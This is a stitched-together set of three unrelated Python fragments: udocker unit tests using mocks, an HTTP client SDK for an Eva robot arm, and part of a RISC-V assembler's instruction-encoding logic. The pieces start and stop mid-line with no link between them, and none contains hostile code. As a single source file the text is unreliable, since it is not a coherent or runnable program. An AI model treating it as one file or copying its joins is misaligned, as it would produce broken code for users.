self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.get_container_id.return_value = "123" mock_local.protect_container.return_value = True status = udoc.do_protect(mock_cmdp) self.assertTrue(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("", "TAG") mock_local.get_container_id.return_value = "" mock_local.protect_imagerepo.return_value = True status = udoc.do_protect(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.get_container_id.return_value = "" mock_local.protect_imagerepo.return_value = True status = udoc.do_protect(mock_cmdp) self.assertTrue(status) @mock.patch('udocker.Udocker._check_imagespec') @mock.patch('udocker.CmdParser') @mock.patch('udocker.KeyStore') @mock.patch('udocker.DockerLocalFileAPI') @mock.patch('udocker.DockerIoAPI') @mock.patch('udocker.Msg') @mock.patch('udocker.LocalRepository') def test_22_do_unprotect(self, mock_local, mock_msg, mock_dioapi, mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg): """Test22 Udocker().do_unprotect().""" self._init() mock_msg.level = 0 udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = True mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") status = udoc.do_unprotect(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.get_container_id.return_value = "123" mock_local.unprotect_container.return_value = False status = udoc.do_unprotect(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.get_container_id.return_value = "123" mock_local.unprotect_container.return_value = True status = udoc.do_unprotect(mock_cmdp) self.assertTrue(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.get_container_id.return_value = "" mock_local.unprotect_imagerepo.return_value = True status = udoc.do_unprotect(mock_cmdp) self.assertTrue(status) self.assertTrue(mock_local.unprotect_imagerepo.called) @mock.patch('udocker.Udocker._check_imagespec') @mock.patch('udocker.CmdParser') @mock.patch('udocker.KeyStore') @mock.patch('udocker.DockerLocalFileAPI') @mock.patch('udocker.DockerIoAPI') @mock.patch('udocker.Msg') @mock.patch('udocker.LocalRepository') def test_23_do_name(self, mock_local, mock_msg, mock_dioapi, mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg): """Test23 Udocker().do_name().""" self._init() mock_msg.level = 0 udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = True mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") status = udoc.do_name(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "NAME", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.get_container_id.return_value = "" status = udoc.do_name(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "NAME", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.get_container_id.return_value = "123" mock_local.set_container_name.return_value = False status = udoc.do_name(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "NAME", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.get_container_id.return_value = "123" mock_local.set_container_name.return_value = True status = udoc.do_name(mock_cmdp) self.assertTrue(status) @mock.patch('udocker.Udocker._check_imagespec') @mock.patch('udocker.CmdParser') @mock.patch('udocker.KeyStore') @mock.patch('udocker.DockerLocalFileAPI') @mock.patch('udocker.DockerIoAPI') @mock.patch('udocker.Msg') @mock.patch('udocker.LocalRepository') def test_24_do_rmname(self, mock_local, mock_msg, mock_dioapi, mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg): """Test24 Udocker().do_rmname().""" self._init() mock_msg.level = 0 udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = True mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") status = udoc.do_rmname(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["NAME", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.del_container_name.return_value = False status = udoc.do_rmname(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["NAME", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.del_container_name.return_value = True status = udoc.do_rmname(mock_cmdp) self.assertTrue(status) @mock.patch('udocker.json') @mock.patch('udocker.ContainerStructure') @mock.patch('udocker.Udocker._check_imagespec') @mock.patch('udocker.CmdParser') @mock.patch('udocker.KeyStore') @mock.patch('udocker.DockerLocalFileAPI') @mock.patch('udocker.DockerIoAPI') @mock.patch('udocker.Msg') @mock.patch('udocker.LocalRepository') def test_25_do_inspect(self, mock_local, mock_msg, mock_dioapi, mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg, mock_cstruct, mock_json): """Test25 Udocker().do_inspect().""" self._init() mock_msg.level = 0 udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = True mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") status = udoc.do_inspect(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.get_container_id.return_value = "123" mock_cstruct.return_value.get_container_attr.return_value = ("", "") status = udoc.do_inspect(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "PRINT", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.get_container_id.return_value = "123" mock_cstruct.return_value.get_container_attr.return_value = ("DIR", "") status = udoc.do_inspect(mock_cmdp) self.assertTrue(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.get_container_id.return_value = "123" mock_cstruct.return_value.get_container_attr.return_value = ( "", "JSON") status = udoc.do_inspect(mock_cmdp) self.assertTrue(status) @mock.patch('udocker.Udocker._check_imagespec') @mock.patch('udocker.CmdParser') @mock.patch('udocker.KeyStore') @mock.patch('udocker.DockerLocalFileAPI') @mock.patch('udocker.DockerIoAPI') @mock.patch('udocker.Msg') @mock.patch('udocker.LocalRepository') def test_26_do_verify(self, mock_local, mock_msg, mock_dioapi, mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg): """Test26 Udocker().do_verify().""" self._init() mock_msg.level = 0 udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = True mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") status = udoc.do_verify(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("", "") status = udoc.do_verify(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.cd_imagerepo.return_value = False status = udoc.do_verify(mock_cmdp) self.assertFalse(status) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = False mock_cmdp.get.side_effect = ["", "", "" "", "", ] mock_chkimg.return_value = ("IMAGE", "TAG") mock_local.cd_imagerepo.return_value = True mock_local.verify_image.return_value = True status = udoc.do_verify(mock_cmdp) self.assertTrue(status) # @mock.patch('udocker.ExecutionMode') # @mock.patch('udocker.CmdParser') # @mock.patch('udocker.KeyStore') # @mock.patch('udocker.DockerLocalFileAPI') # @mock.patch('udocker.DockerIoAPI') # @mock.patch('udocker.Msg') # @mock.patch('udocker.LocalRepository') # def test_27_do_setup(self, mock_local, mock_msg, mock_dioapi, # mock_dlocapi, mock_ks, mock_cmdp, mock_exec): # """Test27 Udocker().do_setup().""" # self._init() # mock_msg.level = 0 # udoc = udocker.Udocker(mock_local) # mock_cmdp.missing_options.return_value = True # mock_cmdp.get.side_effect = ["", "", "" "", "", ] # mock_local.cd_container.return_value = False # status = udoc.do_setup(mock_cmdp) # self.assertFalse(status) # udoc = udocker.Udocker(mock_local) # mock_cmdp.missing_options.return_value = True # mock_cmdp.get.side_effect = ["", "", "" "", "", ] # mock_local.cd_container.return_value = True # mock_exec.set_mode.return_value = False # status = udoc.do_setup(mock_cmdp) # self.assertFalse(status) # udoc = udocker.Udocker(mock_local) # mock_cmdp.missing_options.return_value = True # mock_cmdp.get.side_effect = ["", "", "" "", "", ] # mock_local.cd_container.return_value = True # mock_exec.set_mode.return_value = True # status = udoc.do_setup(mock_cmdp) # self.assertFalse(status) # udoc = udocker.Udocker(mock_local) # mock_cmdp.missing_options.return_value = True # mock_cmdp.get.side_effect = ["", "P1", "" "", "", ] # mock_local.cd_container.return_value = True # mock_local.isprotected_container.return_value = True # mock_exec.set_mode.return_value = True # status = udoc.do_setup(mock_cmdp) # self.assertFalse(status) # udoc = udocker.Udocker(mock_local) # mock_cmdp.missing_options.return_value = True # mock_cmdp.get.side_effect = ["", "P1", "" "", "", ] # mock_local.cd_container.return_value = True # mock_local.isprotected_container.return_value = False # mock_exec.set_mode.return_value = True # status = udoc.do_setup(mock_cmdp) # self.assertFalse(status) @mock.patch('udocker.UdockerTools') @mock.patch('udocker.CmdParser') @mock.patch('udocker.Msg') @mock.patch('udocker.LocalRepository') def test_28_do_install(self, mock_local, mock_msg, mock_cmdp, mock_utools): """Test28 Udocker().do_install().""" self._init() mock_msg.level = 0 udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = True mock_cmdp.get.side_effect = ["", "", "" "", "", ] status = udoc.do_install(mock_cmdp) self.assertFalse(mock_utools.return_value.purge.called) # self.assertTrue(mock_utools.return_value.install.called) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = True mock_cmdp.get.side_effect = ["", "--purge", "" "", "", ] mock_utools.reset_mock() mock_cmdp.reset_mock() status = udoc.do_install(mock_cmdp) # self.assertTrue(mock_utools.return_value.purge.called) self.assertTrue(mock_utools.return_value.install.called_with(False)) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = True mock_cmdp.get.side_effect = ["", "--purge", "--force" "", "", ] mock_utools.reset_mock() mock_cmdp.reset_mock() status = udoc.do_install(mock_cmdp) # self.assertTrue(mock_utools.return_value.purge.called) self.assertTrue(mock_utools.return_value.install.called_with(True)) udoc = udocker.Udocker(mock_local) mock_cmdp.missing_options.return_value = True mock_cmdp.get.side_effect = ["", "", "--force" "", "", ] mock_utools.reset_mock() mock_cmdp.reset_mock() status = udoc.do_install(mock_cmdp) # self.assertFalse(mock_utools.return_value.purge.called) self.assertTrue(mock_utools.return_value.install.called_with(True)) @mock.patch('udocker.Msg.out') @mock.patch('udocker.CmdParser') @mock.patch('udocker.LocalRepository') def test_29_do_help(self, mock_local, mock_cmdp, mock_msgout): """Test29 Udocker().do_help().""" self._init() udoc = udocker.Udocker(mock_local) mock_cmdp.get.side_effect = ["run", "help", "" "", "", ] udoc.do_help(mock_cmdp) self.assertTrue(mock_msgout.called) @mock.patch('udocker.CmdParser') @mock.patch('udocker.LocalRepository') def test_30_do_version(self, mock_local, mock_cmdp): """Test30 Udocker().do_version().""" self._init() udoc = udocker.Udocker(mock_local) mock_cmdp.get.side_effect = ["run", "", "" "", "", ] version = udoc.do_version(mock_cmdp) self.assertIsNotNone(version) class CmdParserTestCase(unittest.TestCase): """Test CmdParserTestCase() command line interface.""" @classmethod def setUpClass(cls): """Setup test.""" set_env() def test_01__init(self): """Test01 CmdParser() Constructor.""" cmdp = udocker.CmdParser() self.assertEqual(cmdp._argv, "") self.assertIsInstance(cmdp._argv_split, dict) self.assertIsInstance(cmdp._argv_consumed_options, dict) self.assertIsInstance(cmdp._argv_consumed_params, dict) self.assertEqual(cmdp._argv_split['CMD'], "") self.assertEqual(cmdp._argv_split['GEN_OPT'], []) self.assertEqual(cmdp._argv_split['CMD_OPT'], []) self.assertEqual(cmdp._argv_consumed_options['GEN_OPT'], []) self.assertEqual(cmdp._argv_consumed_options['CMD_OPT'], []) self.assertEqual(cmdp._argv_consumed_params['GEN_OPT'], []) self.assertEqual(cmdp._argv_consumed_params['CMD_OPT'], []) def test_02_parse(self): """Test02 CmdParser().parse().""" cmdp = udocker.CmdParser() status = cmdp.parse("udocker run --bindhome " "--hostauth --hostenv -v /sys" " -v /proc -v /var/run -v /dev" " --user=jorge --dri myfed firefox") self.assertTrue(status) def test_03_missing_options(self): """Test03 CmdParser().missing_options().""" cmdp = udocker.CmdParser() cmdp.parse("udocker run --bindhome " "--hostauth --hostenv -v /sys" " -v /proc -v /var/run -v /dev" " --user=jorge --dri myfed firefox") out = cmdp.missing_options() self.assertIsInstance(out, list) def test_04_get(self): """Test04 CmdParser().get().""" cmdp = udocker.CmdParser() cmdp.declare_options("-v= -e= -w= -u= -i -t -a") cmdp.parse("udocker run --bindhome " "--hostauth --hostenv -v
import json import time import logging import requests from .robot_state import RobotState from .eva_errors import eva_error, EvaError, EvaAutoRenewError # TODO add more granular logs using __logger # TODO lots of sleeps in control_* de to the robot state being updated slowly after starting an action, can this be improved? class EvaHTTPClient: """ Eva HTTP client - host_ip (string): The IP address of an Eva, i.e. 192.168.1.245 - api_token (string): A valid API token for accessing Eva, retrievable from the Choreograph config page - custom_logger (logging.Logger): An *optional* logger, if not supplied the client will instantiate its own - request_timeout (float): An *optional* time in seconds to wait for a request to resolve, defaults to 5 - renew_period (int): An *optional* time in seconds between renew session requests, defaults to 20 minutes """ def __init__(self, host_ip, api_token, custom_logger=None, request_timeout=5, renew_period=60 * 20): self.host_ip = host_ip self.api_token = api_token self.request_timeout = request_timeout if custom_logger is not None: self.__logger = custom_logger else: self.__logger = logging.getLogger('evasdk.EvaHTTPClient:{}'.format(host_ip)) self.session_token = None self.renew_period = renew_period self.__last_renew = time.time() if not 0 < renew_period < 30 * 60: raise ValueError('Session must be renewed before expiring (30 minutes)') def api_call_with_auth(self, *args, **kwargs): r = self.__api_request(*args, **kwargs) # Try creating a new session if we get an auth error and retrying the failed request if r.status_code == 401: self.__logger.debug('Creating a new session and retrying failed request') self.auth_create_session() return self.__api_request(*args, **kwargs) if self.renew_period < time.time() - self.__last_renew < 30 * 60: self.__logger.debug('Automatically renewing session') try: self.auth_renew_session() except EvaError as e: raise EvaAutoRenewError('Failed to automatically renew, got error {}'.format(str(e))) return r def __api_request(self, method, path, payload=None, headers=None, timeout=None): if not headers: headers = {'Authorization': 'Bearer {}'.format(self.session_token)} return requests.request( method, 'http://{}/api/v1/{}'.format(self.host_ip, path), data=payload, headers=headers, timeout=(timeout or self.request_timeout), ) # API VERSIONS def api_versions(self): r = self.__api_request('GET', 'versions') if r.status_code != 200: eva_error('api_versions request error', r) return r.json() # AUTH def auth_renew_session(self): self.__logger.debug('Renewing session token {}'.format(self.session_token)) # Bypass api_call_with_auth to avoid getting in a renewal loop r = self.__api_request('POST', 'auth/renew') if r.status_code == 401: self.session_token = None self.auth_create_session() elif r.status_code != 204: eva_error('auth_renew_session request error', r) else: self.__last_renew = time.time() def auth_create_session(self): self.__logger.debug('Creating session token') # Bypass api_call_with_auth to avoid getting in a 401 loop r = self.__api_request('POST', 'auth', payload=json.dumps({'token': self.api_token}), headers={}) if r.status_code != 200: eva_error('auth_create_session request error', r) self.__last_renew = time.time() self.session_token = r.json()['token'] self.__logger.debug('Created session token {}'.format(self.session_token)) return self.session_token def auth_invalidate_session(self): self.__logger.debug('Invalidating session token {}'.format(self.session_token)) r = self.__api_request('DELETE', 'auth') if r.status_code != 204: eva_error('auth_invalidate_session request error', r) self.session_token = None # DATA # TODO consider adding type for switch between flat and object modes def data_snapshot(self, mode='flat'): r = self.api_call_with_auth('GET', 'data/snapshot?mode=' + mode) if r.status_code != 200: eva_error('data_snapshot request error', r) return r.json()['snapshot'] def data_snapshot_property(self, prop, mode='object'): snapshot = self.data_snapshot(mode=mode) if prop in snapshot: return snapshot[prop] else: eva_error('data_snapshot_property request error, property {} not found'.format(prop)) def data_servo_positions(self): return self.data_snapshot_property('servos.telemetry.position') # USERS def users_get(self): r = self.api_call_with_auth('GET', 'users') if r.status_code != 200: eva_error('users_get request error', r) return r.json() # CONFIG def config_update(self, update): r = self.api_call_with_auth( 'POST', 'config/update', update, headers={'Content-Type': 'application/x.automata-update'}, timeout=30 ) if r.status_code != 200: eva_error('config_update error', r) return r.json() # GPIO def gpio_set(self, pin, status): r = self.__globals_editing(keys='outputs.' + pin, values=status) if r.status_code != 200: eva_error('gpio_set error', r) def gpio_get(self, pin, pin_type): if (pin not in ['a0', 'a1', 'd0', 'd1', 'd2', 'd3', 'ee_d0', 'ee_d1', 'ee_a0', 'ee_a1']): eva_error('gpio_get error, no such pin ' + pin) if (pin_type not in ['input', 'output']): eva_error('gpio_get error, pin_type must be "input" or "output"') return self.data_snapshot_property('global.{}s'.format(pin_type))[pin] # GPIO helper function def __globals_editing(self, keys, values, mode='flat'): data = {'changes': []} if (isinstance(keys, list) and isinstance(values, list)): [data['changes'].append({'key': c[0], 'value': c[1]}) for c in zip(keys, values)] else: data['changes'].append({'key': keys, 'value': values}) data = json.dumps(data) r = self.api_call_with_auth('POST', 'data/globals?mode=' + mode, data) return r # TOOLPATHS def toolpaths_list(self): r = self.api_call_with_auth('GET', 'toolpaths') if r.status_code != 200: eva_error('toolpaths_list error', r) return r.json()['toolpaths'] def toolpaths_retrieve(self, ID): r = self.api_call_with_auth('GET', 'toolpaths/{}'.format(ID)) if r.status_code != 200: eva_error('toolpaths_retrieve error for ID {}'.format(ID), r) return r.json()['toolpath'] def toolpaths_save(self, name, toolpathRepr): toolpaths = self.toolpaths_list() toolpathId = None for toolpath in toolpaths: if toolpath['name'] == name: toolpathId = toolpath['id'] break toolpath = json.dumps({'name': name, 'toolpath': toolpathRepr}) if toolpathId is None: action = 'save' r = self.api_call_with_auth('POST', 'toolpaths', toolpath) else: action = 'update' r = self.api_call_with_auth('PUT', 'toolpaths/{}'.format(toolpathId), toolpath) if r.status_code != 200: eva_error('toolpaths_save {} error'.format(action), r) else: if action == 'save': toolpathId = r.json()['toolpath']['id'] return toolpathId def toolpaths_use_saved(self, toolpathId): r = self.api_call_with_auth('POST', 'toolpaths/{}/use'.format(toolpathId)) if r.status_code != 200: eva_error('toolpaths_use_saved error', r) def toolpaths_use(self, toolpathRepr): r = self.api_call_with_auth('POST', 'toolpath/use', json.dumps({'toolpath': toolpathRepr})) if r.status_code != 200: eva_error('toolpaths_use error', r) def toolpaths_delete(self, toolpathId): r = self.api_call_with_auth('DELETE', 'toolpaths/{}'.format(toolpathId)) if r.status_code != 200: eva_error('toolpaths_delete error', r) # LOCK def lock_status(self): r = self.api_call_with_auth('GET', 'controls/lock') if r.status_code != 200: eva_error('lock_status error', r) return r.json() def lock_lock(self): r = self.api_call_with_auth('POST', 'controls/lock') if r.status_code != 200: eva_error('lock_lock error', r) def lock_renew(self): r = self.api_call_with_auth('PUT', 'controls/lock') if r.status_code != 200: eva_error('lock_renew error', r) def lock_unlock(self): r = self.api_call_with_auth('DELETE', 'controls/lock') if r.status_code != 200: eva_error('lock_unlock error', r) def lock_wait_for(self, interval_sec=2, timeout=None): if self.lock_status()['owner'] == 'you': return if timeout is not None: timeoutT = time.time() + timeout while True: try: self.lock_lock() return except Exception as e: if not isinstance(e, EvaError): raise e pass if timeout is not None: if timeoutT < time.time(): eva_error('lock_wait_for timeout triggered') time.sleep(interval_sec) # CONTROLS/STATE def control_wait_for(self, goal, interval_sec=1): """ control_wait_for will poll Eva's state, waiting for Eva to reach the goal state """ parsed_goal = RobotState(goal) while True: robot_state = RobotState(self.data_snapshot()['control.state']) if robot_state == RobotState.ERROR: eva_error('Eva is in error control state') elif robot_state == parsed_goal: return time.sleep(interval_sec) def control_wait_for_ready(self): """ control_wait_for_ready will poll Eva's state, waiting for Eva to reach "Ready" state """ self.control_wait_for(RobotState.READY) def control_home(self, wait_for_ready=True): r = self.api_call_with_auth('POST', 'controls/home') if r.status_code != 200: eva_error('control_home error', r) elif wait_for_ready: time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state self.control_wait_for(RobotState.READY) def control_run(self, loop=1, wait_for_ready=True, mode='teach'): r = self.api_call_with_auth('POST', 'controls/run', json.dumps({'mode': mode, 'loop': loop})) if r.status_code != 200: eva_error('control_run error', r) elif wait_for_ready: time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state self.control_wait_for(RobotState.READY) def control_go_to(self, joints, wait_for_ready=True, velocity=None, duration=None, mode='teach'): body = {'joints': joints, 'mode': mode} if velocity is not None: body['velocity'] = velocity elif duration is not None: body['time'] = duration r = self.api_call_with_auth('POST', 'controls/go_to', json.dumps(body)) if r.status_code != 200: eva_error('control_go_to error', r) elif wait_for_ready: time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state self.control_wait_for(RobotState.READY) def control_pause(self, wait_for_paused=True): r = self.api_call_with_auth('POST', 'controls/pause') if r.status_code != 200: eva_error('control_pause error', r) elif wait_for_paused: time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state self.control_wait_for(RobotState.PAUSED) def control_resume(self, wait_for_ready=True): r = self.api_call_with_auth('POST', 'controls/resume') if r.status_code != 200: eva_error('control_resume error', r) elif wait_for_ready: time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state self.control_wait_for(RobotState.READY) def control_cancel(self, wait_for_ready=True): r = self.api_call_with_auth('POST', 'controls/cancel') if r.status_code != 200: eva_error('control_cancel error', r) elif wait_for_ready: time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state self.control_wait_for(RobotState.READY) def control_stop_loop(self, wait_for_ready=True): r = self.api_call_with_auth('POST', 'controls/stop_loop') if r.status_code != 200: eva_error('control_stop_loop error', r) elif wait_for_ready: time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state self.control_wait_for(RobotState.READY) def control_reset_errors(self, wait_for_ready=True): r = self.api_call_with_auth('POST', 'controls/reset_errors') if r.status_code != 204: eva_error('control_reset_errors error', r) elif wait_for_ready: time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state self.control_wait_for(RobotState.READY) # CALCULATIONS def calc_forward_kinematics(self, joints, fk_type='both', tcp_config=None): body = {'joints': joints} if tcp_config is not None: body['tcp_config'] = tcp_config r = self.api_call_with_auth('PUT', 'calc/forward_kinematics', json.dumps(body)) if r.status_code != 200: eva_error('calc_forward_kinematics error', r) if (fk_type == 'position') or (fk_type == 'orientation'): return r.json()['fk'][fk_type] elif (fk_type == 'both'): return r.json()['fk'] else: eva_error('calc_forward_kinematics invalid fk_type {}'.format(fk_type), r) def calc_inverse_kinematics(self, guess, target_position, target_orientation, tcp_config=None): body = {'guess': guess,
= args[2] instructionFields["rs1"] = args[1] instructionFields["funct3"] = 5 instructionFields["rd"] = args[0] instructionFields["opcode"] = 51 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.REM): instructionFields = {} instructionFields["type"] = "R" instructionFields["funct7"] = 1 instructionFields["rs2"] = args[2] instructionFields["rs1"] = args[1] instructionFields["funct3"] = 6 instructionFields["rd"] = args[0] instructionFields["opcode"] = 51 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.REMU): instructionFields = {} instructionFields["type"] = "R" instructionFields["funct7"] = 1 instructionFields["rs2"] = args[2] instructionFields["rs1"] = args[1] instructionFields["funct3"] = 7 instructionFields["rd"] = args[0] instructionFields["opcode"] = 51 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.SLTI): instructionFields = {} instructionFields["type"] = "I" instructionFields["imm"] = args[2] instructionFields["rs1"] = args[1] instructionFields["funct3"] = 2 instructionFields["rd"] = args[0] instructionFields["opcode"] = 19 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.SLTIU): instructionFields = {} instructionFields["type"] = "I" instructionFields["imm"] = args[2] instructionFields["rs1"] = args[1] instructionFields["funct3"] = 3 instructionFields["rd"] = args[0] instructionFields["opcode"] = 19 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.SLT): instructionFields = {} instructionFields["type"] = "R" instructionFields["funct7"] = 0 instructionFields["rs2"] = args[2] instructionFields["rs1"] = args[1] instructionFields["funct3"] = 2 instructionFields["rd"] = args[0] instructionFields["opcode"] = 51 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.SLTU): instructionFields = {} instructionFields["type"] = "R" instructionFields["funct7"] = 0 instructionFields["rs2"] = args[2] instructionFields["rs1"] = args[1] instructionFields["funct3"] = 3 instructionFields["rd"] = args[0] instructionFields["opcode"] = 51 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.AUIPC): instructionFields = {} instructionFields["type"] = "U" instructionFields["rd"] = args[0] instructionFields["imm"] = args[1] instructionFields["opcode"] = 23 subInstructionFields.append(instructionFields) #Control transfer instructions elif (instructionEnum == INST.JAL): instructionFields = {} instructionFields["type"] = "J" instructionFields["imm"] = args[0] - programCounter instructionFields["rd"] = 1 instructionFields["opcode"] = 111 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.J): instructionFields = {} instructionFields["type"] = "J" instructionFields["imm"] = args[0] - programCounter instructionFields["rd"] = 0 instructionFields["opcode"] = 111 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.JR): instructionFields = {} instructionFields["type"] = "I" instructionFields["imm"] = 0 instructionFields["rs1"] = args[0] instructionFields["funct3"] = 0 instructionFields["rd"] = 0 instructionFields["opcode"] = 103 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.JALR): instructionFields = {} instructionFields["type"] = "I" instructionFields["imm"] = 0 instructionFields["rs1"] = args[0] instructionFields["funct3"] = 0 instructionFields["rd"] = args[1] instructionFields["opcode"] = 103 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.BEQ): instructionFields = {} instructionFields["type"] = "B" instructionFields["imm"] = args[2] - programCounter instructionFields["rs2"] = args[1] instructionFields["rs1"] = args[0] instructionFields["funct3"] = 0 instructionFields["opcode"] = 99 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.BNE): instructionFields = {} instructionFields["type"] = "B" instructionFields["imm"] = args[2] - programCounter instructionFields["rs2"] = args[1] instructionFields["rs1"] = args[0] instructionFields["funct3"] = 1 instructionFields["opcode"] = 99 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.BLT): instructionFields = {} instructionFields["type"] = "B" instructionFields["imm"] = args[2] - programCounter instructionFields["rs2"] = args[1] instructionFields["rs1"] = args[0] instructionFields["funct3"] = 4 instructionFields["opcode"] = 99 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.BGE): instructionFields = {} instructionFields["type"] = "B" instructionFields["imm"] = args[2] - programCounter instructionFields["rs2"] = args[1] instructionFields["rs1"] = args[0] instructionFields["funct3"] = 5 instructionFields["opcode"] = 99 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.BLTU): instructionFields = {} instructionFields["type"] = "B" instructionFields["imm"] = args[2] - programCounter instructionFields["rs2"] = args[1] instructionFields["rs1"] = args[0] instructionFields["funct3"] = 6 instructionFields["opcode"] = 99 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.BGEU): instructionFields = {} instructionFields["type"] = "B" instructionFields["imm"] = args[2] - programCounter instructionFields["rs2"] = args[1] instructionFields["rs1"] = args[0] instructionFields["funct3"] = 7 instructionFields["opcode"] = 99 subInstructionFields.append(instructionFields) #Load and store instructions elif (instructionEnum == INST.LW): instructionFields = {} instructionFields["type"] = "I" if (len(args) == 3): instructionFields["imm"] = args[1] instructionFields["rs1"] = args[2] elif (len(args) == 2): instructionFields["imm"] = args[1] instructionFields["rs1"] = 0 #<TODO> fix this once we have AUIPC support else: raise Exception("Invalid number of args for \"lw\"") instructionFields["funct3"] = 2 instructionFields["rd"] = args[0] instructionFields["opcode"] = 3 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.LH): instructionFields = {} instructionFields["type"] = "I" if (len(args) == 3): instructionFields["imm"] = args[1] instructionFields["rs1"] = args[2] elif (len(args) == 2): instructionFields["imm"] = args[1] instructionFields["rs1"] = 0 #<TODO> fix this once we have AUIPC support else: raise Exception("Invalid number of args for \"lh\"") instructionFields["funct3"] = 1 instructionFields["rd"] = args[0] instructionFields["opcode"] = 3 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.LHU): instructionFields = {} instructionFields["type"] = "I" if (len(args) == 3): instructionFields["imm"] = args[1] instructionFields["rs1"] = args[2] elif (len(args) == 2): instructionFields["imm"] = args[1] instructionFields["rs1"] = 0 #<TODO> fix this 